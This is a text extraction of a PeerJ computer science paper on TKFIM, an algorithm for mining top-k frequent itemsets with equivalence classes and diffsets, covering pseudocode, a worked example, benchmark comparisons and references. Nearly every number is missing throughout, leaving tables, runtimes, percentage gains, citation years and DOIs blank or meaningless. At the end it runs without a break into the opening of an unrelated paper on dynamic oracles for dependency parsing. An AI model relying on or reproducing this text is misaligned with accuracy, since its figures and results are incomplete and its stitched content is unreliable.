given database d, an itemset x is referred to as frequent itemsets if its support is greater or even equal to the support of k itemset in a set of items i, where i is the set of items in the decreasing support order the support value is calculated from the user-supplied value of k (saif-ur-rehman et al., ). def- : identical frequent itemsets: in the given dataset d, identical frequent itemset (ifis) are those frequent itemset s = x , x ...xm has the same support as of set s where <=m<=i and s ⊆ i (saif-ur-rehman et al., ). def- : top-k frequent itemsets: a set of all ifis in s= {x , x ,.....xm} is called top-k frequent itemset if it includes frequent itemset of the highest support to the k th support itemset in i, where i is a set of all identical frequent itemsets (yildirim, birant & alpyildiz, ). top-k list structure in this sub-section, we describe list (amphawan, lenca & surarerks, ) is an efficient data structure uses in our method to accommodate candidate itemsets. the list is created dynamically based on the itemset to be generated, which holds all possible k itemsets based on users supplied value of k. the items in the list are sorted in support descending order. using a linked list in the suggested algorithm effectively reduces processing time and retrieves the itemsets from memory faster than an expensive i/o operation. the proposed tkfim algorithm uses vertical format datasets to generate frequent itemsets. list contains the set of nodes at different levels. the -itemsets, -itemsets, or more are generated from the vertical dataset. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the top-k frequent itemsets mining algorithms. s.no algorithm purpose of algorithm storage strengths limitations top k closed frequent patterns (tfp) (han et al., ) generate the top k closed patterns for specified value of k array without support threshold limit on candidates’ fis. item- sets mining method without candidates production •scan the database at least - times. • it misses certain important patterns •due to itemsets length restric- tion. •represent the only itemset of higher support in the top-k while other itemsets of similar support are not considered as top- k itemsets. top-n (fu, kwong & tang, ) generate the topmost patterns for specified value of n array without support threshold fis method •approach multiple scans •set two parameters. •apriori based •forced to reduce search-space •huge search space crmn (pyun & yun, ) to generate top k patterns with com- binations reducing method for n- item- sets. fp- tree without support threshold. itemsets mining method with- out candidates’ pro- duction. •more than - inputs parame- ters •stp based approach •forced to reduce search-space •scan db multiple times •required high computation time crm (pyun & yun, ) to generate top k patterns with com- binations reducing method for n- item- sets. fp- tree without support threshold. itemsets mining method with- out candidates’ pro- duction. •search-space focused •huge search space •scan db multiple times •heavy computation time re- quired (continued on next page) iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) s.no algorithm purpose of algorithm storage strengths limitations top-k maximal fis without support threshold (salam & khayal, ) to find top-most fis based on association ratio graph structure. graph without support threshold. • it computes all -itemsets and scans each transaction to build all path sources to destination tree (asd tree) simultaneously. • it identifies those itemsets as top-k itemsets originally item- set has low occurrence in the dataset. top-k miner (saif- ur-rehman et al., ) to find top-k fis without support threshold using cis tree. cis tree without support threshold. reduced the search space •high computation time re- quired high memory consump- tions. •the fis joining procedure is a time consuming process until the desired result is obtained. tkfim [proposed] top-k frequent item- sets mining without support threshold based on equivalence classes lookup list reduce search space and run time •the top-k-fis mining first generates the entire -itemsets with support from the given dataset which consumes huge memory at first level. •search space focused tech- nique the top-k list does not store any non-frequent itemset. the top-k list structure of a node is given in fig. : where the top-k list structure of a node having first field is used to store itemset, the second is the support field identified the number of times the itemset occurs in the dataset. diffset is the third field which stores the difference set of transaction id of transactions. the last field’s size points to the level of an itemset. detailed working of the algorithm it is a difficult task to find top-k frequent itemset in large databases. this section presents the evolution of a new top-k mining algorithm to calculate top-k all ifis without the support threshold. the proposed procedure applies to a vertical database structure that consists of transaction ids followed by items. our technique uses a class-based search strategy for searching itemsets with the highest values of support, and it mines the candidates of the current class-based on the join process. the candidate itemsets generation for the current class will be avoided if an itemset has less support than the least support in the top-k. the next class membership process is then applied accordingly and repeated until no frequent items or candidate items have been identified. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. itemsets support diffsets size figure structure of top-k list. full-size doi: . /peerjcs. /fig- algorithm top-k fis mining algorithm : scan d to generate -itemset with support count : create top-k list and -itemsset is initialized : order top-k list in descending order of the support count : smallest k assign to the least support kth itemset in the top-k list : generate candidate-itemsets with support count using diffset : create a list top-k : while k <l en l i st do : k + + : while k <l en l i st do : if pr e f i x a == pr e f i x b then : i tems← [i tem a , i tem b ] : ke y ←pr e f i x a + i tems : diffset ←t (item a)− t (item b) : support ← t (item a) –diffset : end if : create an itemset entry and insert it into the top-k list : if support >= smallestk then : i temset [key]← support : else if support <smallestk then : break : end if : end while : k + + : k + + : end while : repeat step , and until no candidate itemsets can be found : return top-k list of fis the pseudocode of our proposed methodology is given in algorithm , and the details of each step are described below: . scan the database and transform it into a vertical format. . sort all items in descending support order. . initializing top-k list to -itemset, where k is the user-provided number of a frequent itemset. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. . computing -itemsets from -itemset using diffset till the least support itemset in top-k list using equivalence class concept. . the process continues until the lowest support of an item on the next stage and no frequent items or candidates can be found. . then, the top-k list is returned. lemma : in the frequent itemsets mining, the support value of the itemset is used to apply the anti-monotone property. proof: suppose that there are n transactions in the database, and data structures are constructed. there are patterns p in d with m length and pattern p′ in d, which is supper pattern of p, with m+ length. in the worst case, both p and p′ are included in t (k <=n). the anti-monotonic property means that if any p is an invalid pattern, the supper pattern p′ of p is also an invalid pattern, which must be satisfied in this method. however, in the general case, the set of transactions containing p′ is a subset of the set of transactions containing p. thus, sup(p′ ) <= sup(p) is always established. if the p is an invalid pattern, sup(p′) <= sup(p) <= misupp is valid. as a result, the itemset count value that satisfies the anti-monotone property (nam et al., a). running example of tkfim algorithm the algorithm is expressed by using database d, as shown in table . it contains ten transactions having six different items. consider the number of required results specified by the user k is four and six. our task is to find the top-k itemsets with the highest support from the given transaction dataset. table illustrates the generated top- , top- and top- frequent itemsets from the given transaction database d. the first column in transaction databases represents the tids of itemsets, whereas the second column describes the itemsets. step : generating -itemset by scanning the transaction database the format of the input dataset is of considerable importance in most of the frequent itemsets mining algorithm. there are two types of dataset representations. one is a horizontal data format, and the other is a vertical data format. in a horizontal data format, a transaction database is similar to a list/array of transactions. each of the tid contains the itemsets. the horizontal transaction database format is given in table . in a vertical data format, each record represents a transaction. this transaction contains itemsets followed by a distinct transaction identifier. the vertical transaction database format is shown in table . most of the previous work adopts horizontal dataset representation. our algorithm has used the vertical layout of the dataset because the horizontal data format has some drawbacks. we first transform the input horizontal transaction dataset into a vertical format with only frequent itemsets and their corresponding transaction ids. this generates the k-itemsets of size one, as shown in table . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table transaction database. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f table generated top- , top- and top- itemsets. top-k fis top- fis top- fis top- fis f: f: f: b: , bf: b: , fb: b: , fb: a: , fa: a: , fa: ba: ba: d: , fd: bd= , fbd= table horizontal database format. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f step : sort all items in descending support order all items are sorted in descending order, as shown in fig. (step ). step : computing -itemsets from -itemsets using diffsets pruning process the candidate’s generation process is based on two constraints. first, it requires the size of the itemsets to be the same. secondly, both itemset must have the same prefix, which means that each item of the itemset is identical except the last. when both itemsets meet iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table vertical database format. itemsets tid f , , , , , , , , , b , , , , , , , , a , , , , , , , d , , , , , c , , , e , , table converted vertical database format. itemsets tid a , , , , , , , b , , , , , , , , c , , , d , , , , , e , , f , , , , , , , , , these limitations, k + itemset is generated from k-itemsets with the help of equivalence classes, i.e., -itemsets at the next level are generated by joining every two k-itemset. top-k frequently mined itemsets calculate the difference between the tids lists in both items to find the support value. this will be the support of the newly generated itemsets. if the new itemset support is higher than the minimum kth support item in the top-k list, the newly generated itemset is entered in the top-k list. likewise, the kth pattern is removed from the list of top-k list and is designated as infrequent itemsets. after this step, our first iteration is completed, and as a result, each -itemsets is generated in the same manner as like itemset ‘fb’. we get the -itemsets, as shown in fig. , step ). pruning process in step as shown in fig. (step ), we compute -itemsets from -itemsets using difference sets in the given running example. item ‘f’ and ‘b’ are combined and append together to generate the itemsets ‘fb’ is a top-k frequent itemset. the difference set of ‘fb’ and support is calculated, which is . the support of ‘fb’ is greater than the minimum support inferred as support of the kth itemset in the top-k list. which can be used as support to prune the itemset, then the itemset ‘fb’ is inserted into the top-k list, and as a result, each -itemset are generated in the same manner as like itemset ‘fb,’ as shown in fig. (step ). step : remove infrequent itemsets by counting k value the -itemset node e and c are removed by counting the k value in the top-k list. the -itemset nodes are removed because their frequency is less than the minimum kth support item in the top-k list. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure generation of top-k list structure. full-size doi: . /peerjcs. /fig- iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. step : repeating step- to step- we start the second iteration by sorting the generated -itemset given in fig. (step ). we do not need to scan the database any more to link -itemset in the top-k list. a new entry is created at every occurrence of an item in the top-k list. the itemsets are initialized with support and tids-list. the least support itemset used for the pruning process becomes the k itemset in the top-k list. then, the itemsets in the list are updated. the top-k list has been arranged in the order of descent. finally, all items with less support than the kth item in the top-k list are removed from the top-k list, according to the top-k counting procedure, when the user sets the k value. the itemset generation process is repeated. so in this iteration of the loop, we compute -itemsets from the -itemsets using diffset till the least support itemset in the top-k list. next level itemsets are generated with the help of equivalence classes. the generated -itemsets are as shown in fig. (step ). the process repeats until there are no frequent itemsets found. after that top-k list is returned as required by the user. step : top-k list is returned the generated top-k-list is shown in fig. (step ) returned by the tkfim algorithm. the procedure of the top-k frequent itemsets mining (tkfim) method for the example mentioned above is shown in fig. . experimental results in this section, we present the evaluation of the proposed system. first, there are standard data sets freely available, so they have been used to evaluate the proposed algorithm. we also compare our algorithms with two recent related methods: the top-k miner algorithm, which find the top-k frequent itemsets by using the candidate itemset search (cis-tree) (saif-ur-rehman et al., ) and the bomo algorithm calculating the common top-k itemsets (cheung & fu, ). the fact that they are newly proposed techniques and provided better results than their previous ones is the reason for selecting these two approaches. the techniques calculate frequent element sets by requesting k from the user. the experimental setup and dataset are provided in the following section. experimental setup and datasets several experiments were conducted to measure the performance of the algorithm and compare its results with the methods referred to above. the datasets are available freely and downloaded from the frequent implementation of items and mining (fimi) data repository (goethals, ). the dataset details are given in table . the first column of the table shows the dataset name. in the second column, the total number of transactions in a particular data set is described. whereas the number of items in one transaction is displayed in columns such as avg-length and items column represents the total number of unique elements within a dataset. the last column shows the dataset type. the transaction dataset chess, mushroom, connect, and the t i d k dataset are three real transactions. chess is the first real dataset with items and , dealings. it is a dense dataset with long and short itemset. there are items in the mushroom dataset iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tid items a,b,d,f a,b,f a,d,f b,c,d,e,f b,c,d,e,f a,b,f a,b,d,f a,b,f a,b,c,d,f a,b,c,e,f scan d -itemsets items diffset support fb { } { } fa { , } { } fd { , , , } { } fc { , , , , , } { } fe { , , , , , , } { } ba { , } { } bd { , , , } { } bc { , , , , } { } be { , , , , , } { } ad { , , , } { } dc { , , } { } ce { } { } items tid’s list a { , , , , , , , } b { , , , , , , , , } c { , , , } d { , , , , , , } e { , , } f { , , , , , , , , , } compute -itemsets -itemsets items diffset support fba { , } { } fbd { , , , } { } let user specified number k= -itemsets items tid’s list f { , , , , , , , , , } b { , , , , , , , , } a { , , , , , , , } d { , , , , , , } c { , , , } e { , , } figure generation of frequent item sets. full-size doi: . /peerjcs. /fig- table datasets characteristics. .datasets # transactions ave-length #items type data set source chess , real http://fimi.uantwerpen.be/data/chess.dat mushroom real http://fimi.uantwerpen.be/data/mushroom.dat connect , real http://fimi.uantwerpen.be/data/connect.dat t i d k , , synthetic http://fimi.uantwerpen.be/data/t i d k.dat and transactions. the transaction size is an average of . this is a sparse dataset that contains a small number of common items. over items are built to connect. the longest average transaction volume is a dense dataset. t i d k is a synthetic dataset containing , items and a total transaction count of , items. this dataset has an average of transactions. the proposed technology was carried out in the programming language version . . of python for experimentation. the core duo machine with two gigabytes of memory and windows operating system is the experimental environment. results we have performed experiments on three real and one synthetic dataset. the first experiment has been performed on the aforementioned dataset and the results of the tkfim as shown in table . the first column of the table shows the transaction dataset sequence, the second column contains the data set name, the third column describes the iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/mushroom.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/t i d k.dat http://dx.doi.org/ . /peerj-cs. tkfim data of k= , the fourth column shows the transaction datasets of top-k miners, and the second column shows the results of the bomo procedure and the last column shows the itemsets missing by bomo. in the first stage, we compare the frequent itemsets generated by tkfim with the top-k miner and bomo approach. for the top- frequent itemsets on four datasets, we show the results in table . in the past, the top-n and the top-n support threshold for frequently used item sets are mining methods, such as fp-growth, top-n, and crmn. these methods fail to provide important support patterns due to the tuning of the threshold parameters. the bomo is one of the top pattern mining approaches using two parameters (cheung & fu, ). the n-most interesting itemset is the union of the n-most interesting itemsets with the highest supports for the value of some k. to demonstrate bomo with specified parameters k, having considered the same values for the specified parameter, we compute top- frequent itemsets on all datasets as shown in table . the bomo procedure returns the wrong result and misses essential patterns. the value of the k input parameter is taken up by our proposed tkfim and mine all top-k items in the dataset and does not miss the highest support pattern in the result set, as it is clear from table . the proposed system’s performance is now a matter of question, so we present its result in the next section. performance results of tkfim in the second phase, we study our proposed tkfim method’s performance without support threshold parameter performing sets of experiments on each dataset mentioned above, shown in table . to conduct experiments, the input value of k, provided by the user, is set in the range of five to thirty. figure shows the performance results of all the approaches mentioned above on the ‘‘chess’’ dataset. in this figure, each algorithm has its execution time on the vertical side, while each algorithm performance is shown with different k-values on the horizontal bar. the top-k miner performs poorly in a large value of k provided by the user. bomo produces a large number of infrequent patterns that increase its run time. in all cases, with a k value between five and thirty, the bomo algorithm has shown a poor performance. the blue bar represents the proposed algorithm tkfim, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. the presented results illustrate that tkfim outperforms both the top-k miner and bomo procedures. as shown in the graph, the tkfim discovers the top five frequent items in . s, where the top-k and bomo consume the same amount of time to do the same job. similarly, we discovered that the top ten frequent itemsets by tkfim take . s, whereas the top-k and bomo take six seconds to do the same job. the top thirty frequent itemsets by tkfim take . s, whereas the top-k consume a hundred seconds, and bomo takes , s. our proposed technique’s performance gain over bomo and top-k miner on chess dataset are . and . percent, respectively. figure shows the results of performance on the mushroom dataset. the algorithm’s execution time on the vertical side is shown in this figure, where the horizontal bar reflects every algorithm’s performance for different values of k. the top-k miner performs well iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table top-k fis mined by top-k miner, bomo and tkfim. s.no datasets results of tkfim for k= results of top-k miner for k= results of bomo for n = , k= wrong results itemsets missed by bomo . chess ) = ) = ) = = ) = ) = ) = , = ) , = ) , = ) = , = ) = ) = ) , = ) , = ) , = ) , = ) = , , = ) = , , = ) , = ) , , = , = ) , , = , = ) , , = ) = ) = ) , , = ) , , = ) , , = ) , , = ) , = ) , = . mushroom ) = ) = ) = ) = ) = , = ) = , = ) = ) , = ) = , = ) = , = ) = ) = ) , = , , = ) , = , , = ) , = ) , , , = ) = , = ) = , = ) , = ) , , = ) , = , , = ) , = , , = ) , = ) , = ) , = , , = , , = , , , = ) , = , , = , , = , , , = ) , , = ) , = ) = , = ) = , = ) , , = ) , = , , = ) , = , , = ) , , = ) , = , , = , , = = ) , = , , = , , = = . connect ) = ) = ) = ) = ) = ) = ) = ) , = ) = ) = ) = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , = ) , , = ) , , = ) , , = (continued on next page) iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) s.no datasets results of tkfim for k= results of top-k miner for k= results of bomo for n = , k= wrong results itemsets missed by bomo ) = ) = ) , , = ) , = ) , = ) , , = ) , = ) , = . t i d k ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) = ) , = ) = ) = ) = ) , = ) = ) = ) = ) , = ) = ) = ) = ) , , = ) = ) = ) = ) , , = ) = ) = ) , , = ) = ) = on smaller values of k provided by the user. however, bomo poorly and increase its run time. in all cases of k between four and twenty, the bomo algorithm has shown a poor performance. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. the results show that the performance for a small amount of k is degraded compared to top-k miner because the data set contains only a few short, frequently used items. the tkfim discovers the top four common items in . s, in which the top-k and bomo take a second to do the same task, as shown in the graph. similarly, tkfim found that the top eight frequent itemsets take . s, and bomo took four seconds to do the same job. it also found that tkfim for finding top- frequent itemset takes . s, while the top-k miner takes s and bomo takes , s. the performance gain of our proposed technique over bomo and top-k miner on mushroom dataset is and . percent, respectively. in fig. , the performance results for the connect dataset are shown. in this figure, each algorithm has its execution time on the vertical side of this figure, while each algorithm performance with different k-values is shown on the horizontal bar. the top-k miner performs better on small values of k provided by the user. however, bomo suffered from increased run time. in all cases of k between and ,n the bomo algorithm shown a poor performance. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. as shown in the graph, the tkfim discovers the top five frequent items in . s, the top-k miner takes nine seconds, and bomo produces the result of the top five frequent items in s. similarly, to find the top frequent itemsets by tkfim took . s, top-k miner took iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. r u n t im e (s ec o n d s) k-itemsets chess tkfim top-k miner bomo figure performance results of tkfim on chess datasets. full-size doi: . /peerjcs. /fig- s, and bomo consumed s. the performance gain of our proposed technique over bomo and top-k miner on connect dataset is . and . percent, respectively. the results of synthetic dataset t i d k are shown in fig. . the pattern length is short in synthetic datasets, but it has , items. in this figure, the execution time of each method is shown on the vertical side, whereas the horizontal bar represents the performance of each technique for varying values of k. the top-k miner performs better on small amounts of k provided by the user. we performed experiments for k between one and five. further, the blue bar represents the proposed algorithm, the brown bar expresses the top-k miner results, and the purple bar describes the bomo algorithm results. when frequent patterns of a higher length are discovered, bomo starts to suffer from a radical increase in execution time. as shown in the graph, the tkfim identifies the top one frequent item in . s, the top-k miner takes six seconds, and bomo produces a result of the top one frequent items in s. similarly, to find the top five frequent itemsets, tkfim takes . s, top-k miner takes s, and bomo consumes , s. our proposed technique’s performance gain over bomo and top-k miner on the t d k dataset is . and . percent, respectively. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ru n t im e ( s e co n d s) k-itemsets mushroom tkfim top-k miner bomo figure performance results of tkfim on mushroom dataset. full-size doi: . /peerjcs. /fig- r u n t im e (s ec o n d s) k-itemsets connect tkfim top-k miner bomo figure performance results of tkfim on connect dataset. full-size doi: . /peerjcs. /fig- iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. r u n t im e (s ec o n d s) k-itemsets t i d k tkfim top-k miner bomo figure performance results of tkfim on synthetic dataset. full-size doi: . /peerjcs. /fig- memory usage of tkfim to evaluate the memory consumption of the tkfim algorithms, we execute our method for all the datasets. for the chess dataset, tkfim consumes a mb memory to obtain the result of top- , top- , and top- fis. however, it takes mb memory to produced top- and top- itemsets. similarly, on mushroom datasets, it consumes mb to compute top- fis and top- fis. in all experiments, the gap of memory consumption increases by mb while increasing the value of k. in conclusion, the tkfim algorithm presents the least memory for all the experimental datasets for a lesser value of k. the results of the various dataset are shown in fig. . the memory consumption results of dataset t d k, connect, mushroom, and chess are shown in figs. a, b, c, and d respecitively. these results were computed with the help of code which may not very accurate as because of different factors involment in memory consumpution. however, one thing which is apperent from these results is that less memory is needed for lesser value of k. conclusion frequent itemset mining is an exciting branch of data mining that focuses on looking at frequently co-occurring items. the items could be from patterns in any dataset like a market basket, word usage in documents, clicking behavior of users, gene sequencing, etc. due to its wide range of applications, researchers are always trying to produce effective iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. m em o ry ( m b s) k mushroom m em o ry ( m b s) k t i d k (a) m em o ry ( m b s) k chess (d) m em o ry ( m b s) k connect (c) (b) figure memory usage of tkfim algorithm. full-size doi: . /peerjcs. /fig- solutions. this research has also proposed, designed, and developed an algorithm based on equivalence classes and diffset theory for mining top-k frequent itemsets. it is found that the tkfim has outperformed the results of these approaches in terms of execution and performance, achieving . , . , . , and . percent gain on top-k miner using chess, mushroom, connect, and t d k datasets, respectively. similarly, tkfim has achieved . , , . , and . percent on bomo using chess, mushroom, connect, and t d k datasets, respectively. the proposed tkfim technique outperforms its counterpart on every dataset. in the future, we plan to adapt this work to solve other data mining tasks like sequential pattern mining, temporal fis mining, fis based clustering, and incremental frequent itemsets mining. additional information and declarations funding the work of lisu yu was supported by the state key laboratory of computer architecture (ict, cas) open project under grant carchb , and by nanchang university, nanchang, jiangxi, pr of china. this research was also funded by the deanship of scientific research at princess nourah bint abdulrahman university through the fast-track research iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. funding program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: state key laboratory of computer architecture (ict, cas) open project: carchb . nanchang university, nanchang, jiangxi, pr of china. deanship of scientific research at princess nourah bint abdulrahman university. competing interests the authors declare there are no competing interests. author contributions • saood iqbal and abdul shahid conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • muhammad roman conceived and designed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • zahid khan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • shaha al-otaibi performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • lisu yu performed the experiments, authored or reviewed drafts of the paper, arranged funding, and approved the final draft. data availability the following information was supplied regarding data availability: the data set and code are available in the supplemental files. data was taken from the frequent itemset mining dataset repository (http: //fimi.uantwerpen.be/data/): - t i d k: http://fimi.uantwerpen.be/data/t i d k.dat - chess: http://fimi.uantwerpen.be/data/chess.dat - connect: http://fimi.uantwerpen.be/data/connect.dat - mushroom: http://fimi.uantwerpen.be/data/mushroom.dat. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agrawal r, imielinski t, swami a. . mining association rules between sets of items in large databases. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/ http://fimi.uantwerpen.be/data/t i d k.dat http://fimi.uantwerpen.be/data/chess.dat http://fimi.uantwerpen.be/data/connect.dat http://fimi.uantwerpen.be/data/mushroom.dat http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. agrawal r, srikant r. . fast algorithms for mining association rules. in: proc. th int. conf. very large data bases, vldb, vol. . – . amphawan k, lenca p, surarerks a. . mining top-k periodicfrequent pattern from transactional databases without support threshold. in: international conference on advances in information technology. springer, – . cheung y-l, fu aw-c. . mining frequent itemsets without support threshold: with and without item constraints. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . fournier-viger p, lin jc-w, kiran ru, koh ys, thomas r. . a survey of sequential pattern mining. data science and pattern recognition ( ): – . fu aw-c, kwong rw-w, tang j. . mining n-most interesting itemsets. in: ismis’ : proceedings of the th international symposium on foundations of intelligent systems. berlin, heidelberg: springer-verlag, – . goethals b. . frequent itemset mining dataset repository. in: frequent itemset mining implementations (fimi’ ), . piscataway: ieee. han j, pei j, yin y. . mining frequent patterns without candidate generation. acm sigmod record ( ): – doi . / . . han j, wang j, lu y, tzvetkov p. . mining top-k frequent closed patterns without minimum support. in: ieee international conference on data mining, . proceedings. piscataway: ieee, – . huynh-thi-le q, le t, vo b, le b. . an efficient and effective algorithm for mining top-rank-k frequent patterns. expert systems with applications ( ): – doi . /j.eswa. . . . krishnamoorthy s. . mining top-k high utility itemsets with effective threshold raising strategies. expert systems with applications : – doi . /j.eswa. . . . nam h, yun u, vo b, truong t, deng z-h, yoon e. a. efficient approach for damped window-based high utility pattern mining with list structure. ieee access : – doi . /access. . . nam h, yun u, yoon e, lin jc-w. b. efficient approach for incremental weighted erasable pattern mining with list structure. expert systems with applications : doi . /j.eswa. . . nguyen lt, vo b, hong t-p, thanh hc. . classification based on association rules: a lattice-based approach. expert systems with applications ( ): – doi . /j.eswa. . . . nguyen lt, vo b, nguyen lt, fournier-viger p, selamat a. . etarm: an efficient top-k association rule mining algorithm. applied intelligence ( ): – . pietracaprina a, vandin f. . efficient incremental mining of top-k frequent closed itemsets. in: discovery science, volume of lecture notes in computer science. berlin heidelberg: springer, – . pyun g, yun u. . mining top-k frequent patterns with combination reducing techniques. applied intelligence ( ): – doi . /s - - - . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.eswa. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. saif-ur-rehman , ashraf j, habib a, salam a. . top-k miner: top-k identical fre- quent itemsets discovery without user support threshold. knowledge and information systems ( ): – doi . /s - - - . salam a, khayal msh. . mining top- k frequent patterns without mini- mum support threshold. knowledge and information systems ( ): – doi . /s - - - . taser yp, birant ku, birant d. . multitask-based association rule mining. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . wang h, wang w, yang j, yu ps. . clustering by pattern similarity, in large data sets. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . yildirim p, birant d, alpyildiz t. . discovering the relationships between yarn and fabric properties using association rule mining. turkish journal of electrical engineering & computer sciences ( ): – doi . /elk- - . zaki mj. . scalable algorithms for association mining. ieee transactions on knowledge and data engineering ( ): – doi . / . . zaki mj, gouda k. . fast vertical mining using diffsets. in: proceedings of the ninth acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /elk- - http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. a tabular method for dynamic oracles in transition-based parsing yoav goldberg department of computer science bar ilan university, israel yoav.goldberg@gmail.com francesco sartorio department of information engineering university of padua, italy sartorio@dei.unipd.it giorgio satta department of information engineering university of padua, italy satta@dei.unipd.it abstract we develop parsing oracles for two trans- ition-based dependency parsers, including the arc-standard parser, solving a problem that was left open in (goldberg and nivre, ). we experimentally show that using these or- acles during training yields superior parsing accuracies on many languages. introduction greedy transition-based dependency parsers (nivre, ) incrementally process an input sentence from left to right. these parsers are very fast and provide competitive parsing accuracies (nivre et al., ). however, greedy transition-based parsers still fall behind search-based parsers (zhang and clark, ; huang and sagae, ) with respect to accuracy. the training of transition-based parsers relies on a component called the parsing oracle, which maps parser configurations to optimal transitions with re- spect to a gold tree. a discriminative model is then trained to simulate the oracle’s behavior. a parsing oracle is deterministic if it returns a single canon- ical transition. furthermore, an oracle is partial if it is defined only for configurations that can reach the gold tree, that is, configurations representing pars- ing histories with no mistake. oracles that are both deterministic and partial are called static. tradition- ally, only static oracles have been exploited in train- ing of transition-based parsers. recently, goldberg and nivre ( ; ) showed that the accuracy of greedy parsers can be substantially improved without affecting their pars- ing speed. this improvement relies on the intro- duction of novel oracles that are nondeterministic and complete. an oracle is nondeterministic if it re- turns the set of all transitions that are optimal with respect to the gold tree, and it is complete if it is well-defined and correct for every configuration that is reachable by the parser. oracles that are both non- deterministic and complete are called dynamic. goldberg and nivre ( ) develop dynamic or- acles for several transition-based parsers. the con- struction of these oracles is based on a property of transition-based parsers that they call arc decompos- ition. they also prove that the popular arc-standard system (nivre, ) is not arc-decomposable, and they leave as an open research question the construc- tion of a dynamic oracle for the arc-standard system. in this article, we develop one such oracle (§ ) and prove its correctness (§ ). an extension to the arc-standard parser was presented by sartorio et al. ( ), which relaxes the bottom-up construction order and allows mixing of bottom-up and top-down strategies. this parser, called here the lr-spine parser, achieves state-of- the-art results for greedy parsing. like the arc-stand- ard system, the lr-spine parser is not arc-decom- posable, and a dynamic oracle for this system was not known. we extend our oracle for the arc-stand- ard system to work for the lr-spine system as well (§ ). the dynamic oracles developed by goldberg and nivre ( ) for arc-decomposable systems are based on local properties of computations. in con- trast, our novel dynamic oracle algorithms rely on arguably more complex structural properties of com- putations, which are computed through dynamic programming. this leaves open the question of whether a machine-learning model can learn to ef- fectively simulate such complex processes: will the transactions of the association for computational linguistics, ( ) – . action editor: ryan mcdonald. submitted / ; revised / ; published / . c© association for computational 